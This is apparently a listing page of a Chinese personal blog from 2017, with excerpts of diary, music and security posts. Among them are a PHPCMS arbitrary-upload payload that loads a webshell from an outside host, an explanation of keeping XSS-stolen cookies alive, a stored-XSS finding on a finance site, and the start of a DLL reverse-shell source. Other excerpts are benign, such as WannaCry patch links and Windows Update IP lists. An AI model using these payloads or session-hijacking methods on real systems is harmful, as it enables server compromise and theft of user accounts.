讲课心得 之 蜕变 昨天在工作单位给研发还有测试的朋友们讲了一堂课,是我第5次讲课。主要讲安全这块,全部都拿真实的案例来讲解漏洞所造成的危害有多大。下面说说感慨吧。 还记得第一次讲课,好像才不到20人吧,当时紧张的不要不要的。不过在讲课的过程中发现,大声说话可以缓解紧张的心理。而且非常有作用。但是要注意声音不要太过分,要学会控制。虽然很尴尬,而且下面的人我感觉可能听的... 2017年05月17日 个人日记 评论 2 条 喜欢 9 阅读 4,241 views 次 阅读全文
windows update 更新IP地址集合(windows 更新IP段 合集 收集) 因为某些情况下,公司需要禁用这些IP段,晚上花了近4个小时通过各种方法找到了下面的这些数据,虽然不敢说全,但是尽力了。真真的,你看看这篇文字发布的时间也许你就懂了。当然,如果我会反编译windows程序也许会更轻松。好了,不说废话了,直接给出IP地址。 ------------------------------------------------------------------ 65.55.50.189 65.55.50.158 65.55.50.157 ... 2017年05月14日 学习笔记 暂无评论 喜欢 4 阅读 12,495 views 次 阅读全文
MS17-010防范方法 最新勒索病毒(Wannacry蠕虫)防范方法 (445端口关闭方法) 其实关闭这个端口,关闭那个端口的很费劲,而且有的时候还关闭不了,最重要的是你瞎设置万一出错了呢??? 说来说去何必那么费劲!?!?直接打补丁不就完事了么。 WIN7 32(x86)位操作系统补丁地址: http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x86_6bb04d3971bb58ae4bac44219e7169812914df3f.msu  ... 2017年05月13日 学习笔记 暂无评论 喜欢 0 阅读 3,179 views 次 阅读全文
xss平台持久cookie说明 keepsession说明 keepsession功能说明 首先简单说明一下【XSS利用之延长Session生命周期】,说白了就是携带你X到的cookie访问对应的URL地址,一般情况下,如果你X到了对方的cookie,时间长不访问(默认21分钟)后,这个cookie就会失效,你就无法使用这个cookie。那么只要你携带着这个X到的cookie,几分钟访问一次,几分钟访问一次,这样cookie就不会失效(当然,如果程序做了特殊验证,那么就没... 2017年05月09日 学习笔记 暂无评论 喜欢 1 阅读 8,039 views 次 阅读全文
China-X-O-P-A-Y-M 集锦 (中国风的电音) China-X 00:00/00:00 中国从来不乏牛人出现,这首以中国琴音为风格的电音已经火便大江南北,他的作者就是一个中国的帅气小伙,叫“徐梦圆”,这系列的歌曲,节奏欢快,另类的形式展现中国风。我已经开始循环了,你呢。 2017年05月08日 纯音乐 暂无评论 喜欢 0 阅读 4,019 views 次 阅读全文
某互联网金融分站储存XSS 其实这个XSS非常简单,没什么技术含量,只不过属于另类‘储存XSS’吧。。(当然也可以伪造一个钓鱼页面。) 这个XSS呢严格的说是储存XSS,但是如果想利用它,似乎暂时我能想到的只是利用反射XSS的方法利用它。也就是说把这个链接发送给别人。具体为什么呢? 首先,某站有个上传点。如下图: 上传点 因为这个网页做了前端的JS上传判断,所以只能上传jpg等图片格式,那我们... 2017年04月24日 漏洞安全 评论 1 条 喜欢 0 阅读 4,757 views 次 阅读全文
PHPCMS最新版任意文件上传漏洞 及 修复方法 注意这个漏洞不知道是哪位朋友爆出来的,找不到来路。。我只是给了修复建议。 首先打开注册页面,然后向注册页面POST如下payload: siteid=1&modelid=11&username=123456&password=123456&[email protected]&info[content]=<img src=http://xss.com/webshell//php_assert.php#.jpg>&dosubmit=1&protocol= 然后就会报错并返回shell地址... 2017年04月21日 学习笔记 评论 2 条 喜欢 1 阅读 5,812 views 次 阅读全文
快乐崇拜 Come On 快乐崇拜 00:00/00:00 其实快乐崇拜的这首歌的原曲是韩国的一个叫乌龟组合所唱,记得第一次听这个歌曲的时候,我还在上初3吧,应该是了,那个时候还在玩奇迹私服,记得当时听第一遍就非常喜欢这首歌曲了呢,那应该是在一个星期三、四的中午吧,中午放学,立马跑到了网吧,一元一小时,记得网吧的名字叫《新世纪网吧》,然后听到了同学放这首歌曲,真的很好听。 快乐... 2017年04月20日 经典老歌 暂无评论 喜欢 0 阅读 5,814 views 次 阅读全文
真是够贱 想了好一会儿,最终把本篇文章的标题定为【真是够贱】,当然我指的是我自己!!!事出有因,先说一下前因吧,在今年1月份我就已经关注了一款手机,是华为P10(Plus),关注了不知道多久了,然后3月24日终于国内发布会了,然后就是漫长的大家抢买手机过程,问题就在于我真的是看重了华为这个品牌以及这款手机。然后特别坚定,几乎问遍了苏州的实体华为店铺、几乎问遍南京的实... 2017年04月20日 个人日记 评论 9 条 喜欢 3 阅读 7,916 views 次 阅读全文
dll 反弹代码 作者:lostwolf 地址:https://www.t00ls.net/thread-39410-1-1.html // dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "stdafx.h" #include #include #pragma comment(lib,"ws2_32") void reverse_shell(); WSADATA wsaData; SOCKET Winsock; SOCKET Sock; struct sockaddr_in hax; STARTUPINFO ini_processo; PROCESS_INFORMATION processo_info; BOOL WINAPI D... 2017年04月19日 汪洋大海 暂无评论 喜欢 0 阅读 2,981 views 次 阅读全文